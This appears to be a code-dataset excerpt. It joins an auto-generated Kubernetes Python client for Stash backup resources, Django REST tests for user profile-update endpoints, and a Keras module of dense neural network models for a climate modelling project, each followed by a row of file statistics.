return self.watch_stash_appscode_com_v1alpha1_recovery_list_for_all_namespaces_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.watch_stash_appscode_com_v1alpha1_recovery_list_for_all_namespaces_with_http_info(**kwargs) # noqa: E501
return data
def watch_stash_appscode_com_v1alpha1_recovery_list_for_all_namespaces_with_http_info(self, **kwargs): # noqa: E501
"""watch_stash_appscode_com_v1alpha1_recovery_list_for_all_namespaces # noqa: E501
watch individual changes to a list of Recovery # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.watch_stash_appscode_com_v1alpha1_recovery_list_for_all_namespaces_with_http_info(async=True)
>>> result = thread.get()
:param async bool
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server the server will respond with a 410 ResourceExpired error indicating the client must restart their list without the continue field. This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param bool include_uninitialized: If true, partially initialized resources are included in the response.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: IoK8sApimachineryPkgApisMetaV1WatchEvent
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['_continue', 'field_selector', 'include_uninitialized', 'label_selector', 'limit', 'pretty', 'resource_version', 'timeout_seconds', 'watch'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method watch_stash_appscode_com_v1alpha1_recovery_list_for_all_namespaces" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if '_continue' in params:
query_params.append(('continue', params['_continue'])) # noqa: E501
if 'field_selector' in params:
query_params.append(('fieldSelector', params['field_selector'])) # noqa: E501
if 'include_uninitialized' in params:
query_params.append(('includeUninitialized', params['include_uninitialized'])) # noqa: E501
if 'label_selector' in params:
query_params.append(('labelSelector', params['label_selector'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
if 'pretty' in params:
query_params.append(('pretty', params['pretty'])) # noqa: E501
if 'resource_version' in params:
query_params.append(('resourceVersion', params['resource_version'])) # noqa: E501
if 'timeout_seconds' in params:
query_params.append(('timeoutSeconds', params['timeout_seconds'])) # noqa: E501
if 'watch' in params:
query_params.append(('watch', params['watch'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf', 'application/json;stream=watch', 'application/vnd.kubernetes.protobuf;stream=watch']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['*/*']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/apis/stash.appscode.com/v1alpha1/watch/recoveries', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoK8sApimachineryPkgApisMetaV1WatchEvent', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def watch_stash_appscode_com_v1alpha1_repository_list_for_all_namespaces(self, **kwargs): # noqa: E501
"""watch_stash_appscode_com_v1alpha1_repository_list_for_all_namespaces # noqa: E501
watch individual changes to a list of Repository # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.watch_stash_appscode_com_v1alpha1_repository_list_for_all_namespaces(async=True)
>>> result = thread.get()
:param async bool
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server the server will respond with a 410 ResourceExpired error indicating the client must restart their list without the continue field. This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param bool include_uninitialized: If true, partially initialized resources are included in the response.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: IoK8sApimachineryPkgApisMetaV1WatchEvent
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.watch_stash_appscode_com_v1alpha1_repository_list_for_all_namespaces_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.watch_stash_appscode_com_v1alpha1_repository_list_for_all_namespaces_with_http_info(**kwargs) # noqa: E501
return data
def watch_stash_appscode_com_v1alpha1_repository_list_for_all_namespaces_with_http_info(self, **kwargs): # noqa: E501
"""watch_stash_appscode_com_v1alpha1_repository_list_for_all_namespaces # noqa: E501
watch individual changes to a list of Repository # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.watch_stash_appscode_com_v1alpha1_repository_list_for_all_namespaces_with_http_info(async=True)
>>> result = thread.get()
:param async bool
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server the server will respond with a 410 ResourceExpired error indicating the client must restart their list without the continue field. This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param bool include_uninitialized: If true, partially initialized resources are included in the response.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: IoK8sApimachineryPkgApisMetaV1WatchEvent
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['_continue', 'field_selector', 'include_uninitialized', 'label_selector', 'limit', 'pretty', 'resource_version', 'timeout_seconds', 'watch'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method watch_stash_appscode_com_v1alpha1_repository_list_for_all_namespaces" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if '_continue' in params:
query_params.append(('continue', params['_continue'])) # noqa: E501
if 'field_selector' in params:
query_params.append(('fieldSelector', params['field_selector'])) # noqa: E501
if 'include_uninitialized' in params:
query_params.append(('includeUninitialized', params['include_uninitialized'])) # noqa: E501
if 'label_selector' in params:
query_params.append(('labelSelector', params['label_selector'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
if 'pretty' in params:
query_params.append(('pretty', params['pretty'])) # noqa: E501
if 'resource_version' in params:
query_params.append(('resourceVersion', params['resource_version'])) # noqa: E501
if 'timeout_seconds' in params:
query_params.append(('timeoutSeconds', params['timeout_seconds'])) # noqa: E501
if 'watch' in params:
query_params.append(('watch', params['watch'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf', 'application/json;stream=watch', 'application/vnd.kubernetes.protobuf;stream=watch']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['*/*']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/apis/stash.appscode.com/v1alpha1/watch/repositories', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoK8sApimachineryPkgApisMetaV1WatchEvent', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def watch_stash_appscode_com_v1alpha1_restic_list_for_all_namespaces(self, **kwargs): # noqa: E501
"""watch_stash_appscode_com_v1alpha1_restic_list_for_all_namespaces # noqa: E501
watch individual changes to a list of Restic # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.watch_stash_appscode_com_v1alpha1_restic_list_for_all_namespaces(async=True)
>>> result = thread.get()
:param async bool
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server the server will respond with a 410 ResourceExpired error indicating the client must restart their list without the continue field. This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param bool include_uninitialized: If true, partially initialized resources are included in the response.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: IoK8sApimachineryPkgApisMetaV1WatchEvent
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.watch_stash_appscode_com_v1alpha1_restic_list_for_all_namespaces_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.watch_stash_appscode_com_v1alpha1_restic_list_for_all_namespaces_with_http_info(**kwargs) # noqa: E501
return data
def watch_stash_appscode_com_v1alpha1_restic_list_for_all_namespaces_with_http_info(self, **kwargs): # noqa: E501
"""watch_stash_appscode_com_v1alpha1_restic_list_for_all_namespaces # noqa: E501
watch individual changes to a list of Restic # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.watch_stash_appscode_com_v1alpha1_restic_list_for_all_namespaces_with_http_info(async=True)
>>> result = thread.get()
:param async bool
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server the server will respond with a 410 ResourceExpired error indicating the client must restart their list without the continue field. This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param bool include_uninitialized: If true, partially initialized resources are included in the response.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: IoK8sApimachineryPkgApisMetaV1WatchEvent
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['_continue', 'field_selector', 'include_uninitialized', 'label_selector', 'limit', 'pretty', 'resource_version', 'timeout_seconds', 'watch'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method watch_stash_appscode_com_v1alpha1_restic_list_for_all_namespaces" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if '_continue' in params:
query_params.append(('continue', params['_continue'])) # noqa: E501
if 'field_selector' in params:
query_params.append(('fieldSelector', params['field_selector'])) # noqa: E501
if 'include_uninitialized' in params:
query_params.append(('includeUninitialized', params['include_uninitialized'])) # noqa: E501
if 'label_selector' in params:
query_params.append(('labelSelector', params['label_selector'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
if 'pretty' in params:
query_params.append(('pretty', params['pretty'])) # noqa: E501
if 'resource_version' in params:
query_params.append(('resourceVersion', params['resource_version'])) # noqa: E501
if 'timeout_seconds' in params:
query_params.append(('timeoutSeconds', params['timeout_seconds'])) # noqa: E501
if 'watch' in params:
query_params.append(('watch', params['watch'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf', 'application/json;stream=watch', 'application/vnd.kubernetes.protobuf;stream=watch']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['*/*']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/apis/stash.appscode.com/v1alpha1/watch/restics', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoK8sApimachineryPkgApisMetaV1WatchEvent', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 74.156562 | 1,390 | 0.705529 | 42,045 | 319,244 | 5.216768 | 0.009751 | 0.027683 | 0.028741 | 0.043111 | 0.997748 | 0.997748 | 0.997748 | 0.99705 | 0.996458 | 0.996143 | 0 | 0.01415 | 0.229176 | 319,244 | 4,304 | 1,391 | 74.173792 | 0.877179 | 0.037072 | 0 | 0.869227 | 1 | 0.001295 | 0.267232 | 0.116679 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.001726 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
a9d77142bfc0fce1ff304817ac968149c4c5fa15 | 8,571 | py | Python | bookorbooks/account/tests/profile_tests.py | talhakoylu/SummerInternshipBackend | 4ecedf5c97f73e3d32d5a534769e86aac3e4b6d3 | [
"MIT"
] | 1 | 2021-08-10T22:24:17.000Z | 2021-08-10T22:24:17.000Z | bookorbooks/account/tests/profile_tests.py | talhakoylu/SummerInternshipBackend | 4ecedf5c97f73e3d32d5a534769e86aac3e4b6d3 | [
"MIT"
] | null | null | null | bookorbooks/account/tests/profile_tests.py | talhakoylu/SummerInternshipBackend | 4ecedf5c97f73e3d32d5a534769e86aac3e4b6d3 | [
"MIT"
] | null | null | null | from country.models.country_model import Country
from country.models.city_model import City
import json
from rest_framework.test import APITestCase
from django.urls import reverse
from django.contrib.auth import get_user_model
from school.models import School
User = get_user_model()
class ChildProfileTests(APITestCase):
url = reverse("account:child_profile_update")
url_login = reverse("token_obtain_pair")
def setUp(self):
self.username = "johndoe"
self.password = "pass1234"
self.user_type = 2
self.user = User.objects.create_user(username=self.username,
password=self.password,
user_type=self.user_type)
self.login_data = {
"username": self.username,
"password": self.password
}
self.country = Country.objects.create(name="Türkiye", code="Tur")
self.city = City.objects.create(country=self.country,
name="Konya",
code="42")
self.profile_data = {
"id": self.user.id,
"first_name": "John",
"last_name": "Doe",
"email": "johndoe@example.com",
"identity_number": "23456892138",
"gender": 1,
"birth_date": "1999-12-11",
"user_child": {
"city": self.city.id,
"district": None,
"hobbies": "example hobbies"
}
}
def login_with_token(self):
"""
A method for using login process. The main purpose of this code is to avoid code repeat.
"""
response = self.client.post(self.url_login, self.login_data)
self.assertEqual(200, response.status_code)
token = response.data["access"]
self.client.credentials(HTTP_AUTHORIZATION='Bearer ' + token)
def test_is_authenticated_user(self):
"""
Tests that the user cannot access the password update page if user isn't authenticated.
"""
response = self.client.get(self.url)
self.assertEqual(401, response.status_code)
def test_wrong_user_type(self):
"""
Checks if the user type is child or not.
"""
self.user.user_type = 4
self.user.save()
self.login_with_token()
response = self.client.get(self.url)
self.assertEqual(403, response.status_code)
self.assertTrue("detail" in json.loads(response.content))
def test_with_valid_informations(self):
"""
Tests that user can change user and profile fields with correct values.
"""
self.login_with_token()
response = self.client.put(self.url, self.profile_data, format='json')
self.assertEqual(200, response.status_code)
self.assertEqual(json.loads(response.content), self.profile_data)
class ParentProfileTests(APITestCase):
url = reverse("account:parent_profile_update")
url_login = reverse("token_obtain_pair")
def setUp(self):
self.username = "johndoe"
self.password = "pass1234"
self.user_type = 3
self.user = User.objects.create_user(username=self.username,
password=self.password,
user_type=self.user_type)
self.login_data = {
"username": self.username,
"password": self.password
}
self.country = Country.objects.create(name="Türkiye", code="Tur")
self.city = City.objects.create(country=self.country,
name="Konya",
code="42")
self.profile_data = {
"id": self.user.id,
"first_name": "John",
"last_name": "Doe",
"email": "johndoe@example.com",
"identity_number": "23456892138",
"gender": 1,
"birth_date": "1999-12-11",
"user_parent": {
"city": self.city.id,
"district": None,
"profession": "example profession"
}
}
def login_with_token(self):
"""
A method for using login process. The main purpose of this code is to avoid code repeat.
"""
response = self.client.post(self.url_login, self.login_data)
self.assertEqual(200, response.status_code)
token = response.data["access"]
self.client.credentials(HTTP_AUTHORIZATION='Bearer ' + token)
def test_is_authenticated_user(self):
"""
Tests that the user cannot access the password update page if user isn't authenticated.
"""
response = self.client.get(self.url)
self.assertEqual(401, response.status_code)
def test_wrong_user_type(self):
"""
Checks if the user type is child or not.
"""
self.user.user_type = 4
self.user.save()
self.login_with_token()
response = self.client.get(self.url)
self.assertEqual(403, response.status_code)
self.assertTrue("detail" in json.loads(response.content))
def test_with_valid_informations(self):
"""
Tests that user can change user and profile fields with correct values.
"""
self.login_with_token()
response = self.client.put(self.url, self.profile_data, format='json')
self.assertEqual(200, response.status_code)
self.assertEqual(json.loads(response.content), self.profile_data)
class InstructorProfileTests(APITestCase):
url = reverse("account:instructor_profile_update")
url_login = reverse("token_obtain_pair")
def setUp(self):
self.username = "johndoe"
self.password = "pass1234"
self.user_type = 4
self.user = User.objects.create_user(username=self.username,
password=self.password,
user_type=self.user_type)
self.login_data = {
"username": self.username,
"password": self.password
}
self.country = Country.objects.create(name="Türkiye", code="Tur")
self.city = City.objects.create(country=self.country,
name="Konya",
code="42")
self.school = School.objects.create(city=self.city,
name="Example School",
address="Address",
website="webisite.com")
self.profile_data = {
"id": self.user.id,
"first_name": "John",
"last_name": "Doe",
"email": "johndoe@example.com",
"identity_number": "23456892138",
"gender": 1,
"birth_date": "1999-12-11",
"user_instructor": {
"school": self.school.id,
"branch": "example branch"
}
}
def login_with_token(self):
"""
A method for using login process. The main purpose of this code is to avoid code repeat.
"""
response = self.client.post(self.url_login, self.login_data)
self.assertEqual(200, response.status_code)
token = response.data["access"]
self.client.credentials(HTTP_AUTHORIZATION='Bearer ' + token)
def test_is_authenticated_user(self):
"""
Tests that the user cannot access the password update page if user isn't authenticated.
"""
response = self.client.get(self.url)
self.assertEqual(401, response.status_code)
def test_wrong_user_type(self):
"""
Checks if the user type is child or not.
"""
self.user.user_type = 2
self.user.save()
self.login_with_token()
response = self.client.get(self.url)
self.assertEqual(403, response.status_code)
self.assertTrue("detail" in json.loads(response.content))
def test_with_valid_informations(self):
"""
Tests that user can change user and profile fields with correct values.
"""
self.login_with_token()
response = self.client.put(self.url, self.profile_data, format='json')
self.assertEqual(200, response.status_code)
self.assertEqual(json.loads(response.content), self.profile_data) | 38.093333 | 100 | 0.567612 | 928 | 8,571 | 5.102371 | 0.146552 | 0.030412 | 0.045618 | 0.03548 | 0.874129 | 0.873495 | 0.862513 | 0.862513 | 0.862513 | 0.862513 | 0 | 0.020819 | 0.3275 | 8,571 | 225 | 101 | 38.093333 | 0.800659 | 0.101388 | 0 | 0.772455 | 0 | 0 | 0.113174 | 0.012198 | 0 | 0 | 0 | 0 | 0.107784 | 1 | 0.08982 | false | 0.053892 | 0.041916 | 0 | 0.185629 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
a9fbdf0f6f38cfeab243f8a9e11a610d52a6c1ec | 3,631 | py | Python | cbrain/models.py | jens321/CBRAIN-CAM | 92728a48c5f852e2c8c93ba29c9d99cff8e78b90 | [
"MIT"
] | null | null | null | cbrain/models.py | jens321/CBRAIN-CAM | 92728a48c5f852e2c8c93ba29c9d99cff8e78b90 | [
"MIT"
] | null | null | null | cbrain/models.py | jens321/CBRAIN-CAM | 92728a48c5f852e2c8c93ba29c9d99cff8e78b90 | [
"MIT"
] | 5 | 2019-09-30T20:17:13.000Z | 2022-03-01T07:03:30.000Z | """
Define all different types of models.
Created on 2019-01-28-13-17
Author: Stephan Rasp, raspstephan@gmail.com
"""
from .imports import *
from .cam_constants import *
from tensorflow.keras.layers import *
from .layers import *
def act_layer(act):
"""Helper function to return regular and advanced activation layers"""
act = Activation(act) if act in tf.keras.activations.__dict__.keys() \
else tf.keras.layers.__dict__[act]()
return act
def fc_model(input_shape, output_shape, hidden_layers, activation, conservation_layer=False,
inp_sub=None, inp_div=None, norm_q=None):
inp = Input(shape=(input_shape,))
# First hidden layer
x = Dense(hidden_layers[0])(inp)
x = act_layer(activation)(x)
# Remaining hidden layers
for h in hidden_layers[1:]:
x = Dense(h)(x)
x = act_layer(activation)(x)
if conservation_layer:
x = SurRadLayer(inp_sub, inp_div, norm_q)([inp, x])
x = MassConsLayer(inp_sub, inp_div, norm_q)([inp, x])
out = EntConsLayer(inp_sub, inp_div, norm_q)([inp, x])
else:
out = Dense(output_shape)(x)
return tf.keras.models.Model(inp, out)
def relu_model(input_shape, output_shape, hidden_layers, activation, conservation_layer=False,
inp_sub=None, inp_div=None, norm_q=None):
inp = Input(shape=(input_shape,))
# First hidden layer
x = Dense(hidden_layers[0])(inp)
x = act_layer(activation)(x)
# Remaining hidden layers
for h in hidden_layers[1:]:
x = Dense(h)(x)
x = act_layer(activation)(x)
if conservation_layer:
x = SurRadLayer(inp_sub, inp_div, norm_q)([inp, x])
x = MassConsLayer(inp_sub, inp_div, norm_q)([inp, x])
out = EntConsLayer(inp_sub, inp_div, norm_q)([inp, x])
else:
out = Dense(output_shape)(x)
activation = 'relu'
out = act_layer(activation)(out)
return tf.keras.models.Model(inp, out)
def relu_model(input_shape, output_shape, hidden_layers, activation, conservation_layer=False,
inp_sub=None, inp_div=None, norm_q=None):
inp = Input(shape=(input_shape,))
# First hidden layer
x = Dense(hidden_layers[0])(inp)
x = act_layer(activation)(x)
# Remaining hidden layers
for h in hidden_layers[1:]:
x = Dense(h)(x)
x = act_layer(activation)(x)
if conservation_layer:
x = SurRadLayer(inp_sub, inp_div, norm_q)([inp, x])
x = MassConsLayer(inp_sub, inp_div, norm_q)([inp, x])
out = EntConsLayer(inp_sub, inp_div, norm_q)([inp, x])
else:
out = Dense(output_shape)(x)
activation = 'relu'
out = act_layer(activation)(out)
return tf.keras.models.Model(inp, out)
def custom_activation(z):
y = z**10
return y
def log_model(input_shape, output_shape, hidden_layers, activation, conservation_layer=False,
inp_sub=None, inp_div=None, norm_q=None):
inp = Input(shape=(input_shape,))
# First hidden layer
x = Dense(hidden_layers[0])(inp)
x = act_layer(activation)(x)
# Remaining hidden layers
for h in hidden_layers[1:]:
x = Dense(h)(x)
x = act_layer(activation)(x)
if conservation_layer:
x = SurRadLayer(inp_sub, inp_div, norm_q)([inp, x])
x = MassConsLayer(inp_sub, inp_div, norm_q)([inp, x])
out = EntConsLayer(inp_sub, inp_div, norm_q)([inp, x])
else:
out = Dense(output_shape)(x)
activation = activation = custom_activation
out = act_layer(activation)(out)
return tf.keras.models.Model(inp, out)
